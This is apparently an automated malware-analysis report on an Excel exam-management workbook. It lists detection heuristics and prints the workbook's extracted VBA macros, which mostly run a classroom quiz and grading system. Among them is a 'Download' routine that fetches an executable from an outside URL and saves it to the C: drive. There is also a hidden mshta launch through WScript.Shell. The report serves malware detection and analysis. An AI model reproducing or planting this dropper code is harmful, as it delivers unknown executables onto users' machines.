MALICIOUS
Risk Score: 422

Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6412232-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN): LOLBin reference in VBA. Matched line in script:
  CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  s.Write H.ResponseBody
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set H = CreateObject("Microsoft.XMLHTTP")
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://www.yt-e.com/a.exe (Referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27935 bytes |

SHA-256 (macros.bas): a4a431708675c5a19d9a9697b52cd230a9a1183d2fb1a5d1ca5776835ed7c54b

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Download()
Dim H, s
Set H = CreateObject("Microsoft.XMLHTTP")
H.Open "GET", "http://www.yt-e.com/a.exe", False
H.Send
Set s = CreateObject("ADODB.Stream")
s.Type = 1
s.Open
s.Write H.ResponseBody
s.SaveToFile "c:\a.exe", 2
s.Close
End Sub
Sub StartExam()
StudentName = Range("C7").Value
Studentid = Range("C10").Value
StudentClass = Range("C13").Value
ExamID = Range("C16").Value
If StrComp(StudentName, "", 1) = 0 Then
MsgBox "请输入正确的姓名!"
ElseIf StrComp(Studentid, "", 1) = 0 Then
MsgBox "请输入正确的学号!"
ElseIf StrComp(StudentClass, "", 1) = 0 Then
MsgBox "请输入正确的班级!"
ElseIf StrComp(ExamID, "", 1) = 0 Then
MsgBox "请输入正确的考试ID!"
Else
FlushExamInfo
Status = Sheets("开始").Range("L19").Value
If StrComp(Status, "无考试", 1) = 0 Then
MsgBox "当前无考试"
ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
MsgBox "当前考试未开始"
ElseIf StrComp(Status, "考试结束", 1) = 0 Then
MsgBox "当前考试已经结束"
ElseIf StrComp(Status, "考试开始", 1) = 0 Then
GetQuestion
MsgBox "考题获取成功,开始考试!"
End If
End If
End Sub
Sub ConnectServer()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/connectTest"
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "POST", Url, False
xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
xmlhttp.Send "test=test"
Do While xmlhttp.readyState <> 4
DoEvents
Loop
If xmlhttp.ResponseText = "success" Then
MsgBox "连接考试服务器成功!"
End If
Set xmlhttp = Nothing
End Sub
Sub FlushExamInfo()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetInfo"
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "POST", Url, False
xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
xmlhttp.Send "test=test"
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Dim i As Integer
temp = Split(xmlhttp.ResponseText, ",")
For i = 0 To UBound(temp)
temp1 = Split(temp(i), ":")
Dim j As Integer
For j = 0 To UBound(temp1)
If StrComp(temp1(0), "{""name""", 1) = 0 Then
Sheets("开始").Range("A1").Value = Replace(Replace(temp1(1), """", ""), "}", "")
ElseIf StrComp(temp1(0), """state""", 1) = 0 Then
Sheets("开始").Range("L19").Value = Replace(Replace(temp1(1), """", ""), "}", "")
End If
Next j
Next i
End Sub
Sub CheckID()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/CheckStudent?"
Url = Url & "id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub GetQuestion()
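'Get multiple-choice questions
Xuanze
'Get fill-in-the-blank questions
TianKong
'Get true/false questions
PanDuan
'Get short-answer questions
JianDa
'Get hands-on (operation) questions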
CaoZuo
End Sub
Sub Xuanze()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=0"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
QuestionChoice = sc.Eval("query[" & i & "].choice")
Sheets("选择题").Range("A" & QuestionRow).Value = "选择题" & QuestionNumber
Sheets("选择题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Sheets("选择题").Range("B" & QuestionRow).Value = QuestionChoice
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub TianKong()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=2"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("填空题").Range("A" & QuestionRow).Value = "填空题" & QuestionNumber
Sheets("填空题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub PanDuan()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=1"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("判断题").Range("A" & QuestionRow).Value = "判断题" & QuestionNumber
Sheets("判断题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub JianDa()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=3"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("简答题").Range("A" & QuestionRow).Value = "简答题" & QuestionNumber
Sheets("简答题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub CaoZuo()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=4"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
QuestionAsset = sc.Eval("query[" & i & "].answer")
Sheets("操作题").Range("A" & QuestionRow).Value = "操作题" & QuestionNumber
Sheets("操作题").Range("B" & QuestionRow).Value = QuestionTitle
Sheets("操作题").Range("C" & QuestionRow).Value = QuestionAsset
QuestionRow = QuestionRow + 1
Dim H, s
Set H = CreateObject("Microsoft.XMLHTTP")
H.Open "GET", "http://" & IP + "/GetFile?file=" & QuestionAsset, False
H.Send
Set s = CreateObject("ADODB.Stream")
s.Type = 1
s.Open
s.Write H.ResponseBody
s.SaveToFile "d:\exam\" & QuestionAsset, 2
s.Close
Next i
End Sub
Sub SbmitExam()
StudentName = Range("C7").Value
Studentid = Range("C10").Value
StudentClass = Range("C13").Value
ExamID = Range("C16").Value
If StrComp(StudentName, "", 1) = 0 Then
MsgBox "请输入正确的姓名!"
ElseIf StrComp(Studentid, "", 1) = 0 Then
MsgBox "请输入正确的学号!"
ElseIf StrComp(StudentClass, "", 1) = 0 Then
MsgBox "请输入正确的班级!"
ElseIf StrComp(ExamID, "", 1) = 0 Then
MsgBox "请输入正确的考试ID!"
Else
FlushExamInfo
Status = Sheets("开始").Range("L19").Value
If StrComp(Status, "无考试", 1) = 0 Then
MsgBox "当前无考试"
ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
MsgBox "当前考试未开始"
ElseIf StrComp(Status, "考试结束", 1) = 0 Then
MsgBox "当前考试已经结束"
ElseIf StrComp(Status, "考试开始", 1) = 0 Then
'Sheets("开始").Visible = False
CorrectXuanZe
CorrectPanDuan
CorrectTianKong
CorrectJianDa
MsgBox "试卷提交成功,现在你可以回到作答区查看错题情况!"
End If
End If
End Sub
Sub CorrectXuanZe()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=0"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("选择题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 2
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=0"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectPanDuan()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=1"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("判断题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=1"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectTianKong()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=2"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("填空题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=2"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectJianDa()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=3"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("简答题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=3"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=-1"
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
Static oWnd As Object
Dim bRunning As Boolean
#If Win64 Then
bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
If bClose Then
If bRunning Then oWnd.Close
Exit Function
End If
If Not bRunning Then
Set oWnd = CreateWindow()
oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
End If
Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
#Else
Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
#End If
End Function
Function CreateWindow()
Dim sSignature, oShellWnd, oProc
On Error Resume Next
sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
Do
For Each oShellWnd In CreateObject("Shell.Application").Windows
Set CreateWindow = oShellWnd.GetProperty(sSignature)
If Err.Number = 0 Then Exit Function
Err.Clear
Next
Loop
End Function
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Upload()
IP = Sheets("开始").Range("C19").Value
CreateObject("wscript.shell").Run "http://" & IP + "/Upload"
End Sub
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub SetExam()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/NewExam?"
Url = Url & "name=" & Sheets("教师端").Range("E6").Value
Url = Url & "&start=" & Sheets("教师端").Range("I8").Value
Url = Url & "&end=" & Sheets("教师端").Range("I10").Value
Url = Url & "&count0=" & Sheets("教师端").Range("E12").Value
Url = Url & "&count1=" & Sheets("教师端").Range("E14").Value
Url = Url & "&count2=" & Sheets("教师端").Range("E16").Value
Url = Url & "&count3=" & Sheets("教师端").Range("E18").Value
Url = Url & "&count4=" & Sheets("教师端").Range("E20").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub DelExam()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/DelExam?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub Test()
Sheets("开始").Visible = True
End Sub
Sub GetAllMark()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetAllMark?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
StudentName = sc.Eval("query[" & i & "].name")
Studentid = sc.Eval("query[" & i & "].id")
Studentchoice = sc.Eval("query[" & i & "].choice")
Studentjudgment = sc.Eval("query[" & i & "].judgment")
Studentcompletion = sc.Eval("query[" & i & "].completion")
Sheets("教师端").Range("M" & QuestionRow).Value = StudentName
Sheets("教师端").Range("N" & QuestionRow).Value = Studentid
Sheets("教师端").Range("O" & QuestionRow).Value = Studentchoice * Sheets("教师端").Range("I12").Value
Sheets("教师端").Range("P" & QuestionRow).Value = Studentjudgment * Sheets("教师端").Range("I14").Value
Sheets("教师端").Range("Q" & QuestionRow).Value = Studentcompletion * Sheets("教师端").Range("I16").Value
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub GetAllAnswer()
IP = Sheets("开始").Range("C19").Value
CreateObject("wscript.shell").Run "http://" & IP + "/Download?msg=All"
End Sub
Sub GetAllCheat()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetCheat?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 39
For i = 0 To QuestionCount - 1
StudentName = sc.Eval("query[" & i & "].name")
Studentid = sc.Eval("query[" & i & "].id")
cheat1 = sc.Eval("query[" & i & "].cheat1")
cheat2 = sc.Eval("query[" & i & "].cheat2")
cheat3 = sc.Eval("query[" & i & "].cheat3")
Sheets("教师端").Range("B" & QuestionRow).Value = StudentName
Sheets("教师端").Range("C" & QuestionRow).Value = Studentid
Sheets("教师端").Range("D" & QuestionRow).Value = cheat1
Sheets("教师端").Range("E" & QuestionRow).Value = cheat2
Sheets("教师端").Range("F" & QuestionRow).Value = cheat3
QuestionRow = QuestionRow + 1
Next i
End Sub
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
Static oWnd As Object
Dim bRunning As Boolean
#If Win64 Then
bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
If bClose Then
If bRunning Then oWnd.Close
Exit Function
End If
If Not bRunning Then
Set oWnd = CreateWindow()
oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
End If
Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
#Else
Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
#End If
End Function
Function CreateWindow()
Dim sSignature, oShellWnd, oProc
On Error Resume Next
sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
Do
For Each oShellWnd In CreateObject("Shell.Application").Windows
Set CreateWindow = oShellWnd.GetProperty(sSignature)
If Err.Number = 0 Then Exit Function
Err.Clear
Next
Loop
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 108032 bytes |

SHA-256 (vbaProject_00.bin): 588ae4e81b4d5c232ab336efba8c26aef5078789a901524191bf2498fb004b1a

Detection

- ClamAV: Doc.Dropper.Agent-6412232-1
- Obfuscation or payload: unlikely